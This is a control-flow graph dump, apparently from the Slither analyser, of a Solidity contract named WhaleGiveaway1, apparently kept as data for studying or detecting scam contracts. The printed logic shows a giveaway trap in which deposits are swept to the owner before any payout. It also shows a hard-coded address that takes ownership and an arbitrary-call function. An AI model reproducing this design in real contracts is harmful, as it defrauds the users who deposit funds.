Contract: WhaleGiveaway1
==================================================

Function: fallback
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

Edges:

Function: redeem
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.IF
  Expression: msg.value >= minEligibility

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: Owner.transfer(this.balance)

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: msg.sender.transfer(this.balance)

  ID: 4
  Type: NodeType.ENDIF
  Expression: 

Edges:
  0 -> 1
  1 -> 2
  1 -> 4
  2 -> 3
  3 -> 4

Function: withdraw
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.IF
  Expression: msg.sender == 0x7a617c2B05d2A74Ff9bABC9d81E5225C1e01004b

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: Owner = 0x7a617c2B05d2A74Ff9bABC9d81E5225C1e01004b

  ID: 3
  Type: NodeType.ENDIF
  Expression: 

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: require(bool)(msg.sender == Owner)

  ID: 5
  Type: NodeType.EXPRESSION
  Expression: Owner.transfer(this.balance)

Edges:
  0 -> 1
  1 -> 2
  1 -> 3
  2 -> 3
  3 -> 4
  4 -> 5

Function: Command
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool)(msg.sender == Owner)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: adr.call.value(msg.value)(data)

Edges:
  0 -> 1
  1 -> 2

Function: slitherConstructorVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: Owner = msg.sender

Edges:

Function: slitherConstructorConstantVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: minEligibility = 999001000000000000

Edges:


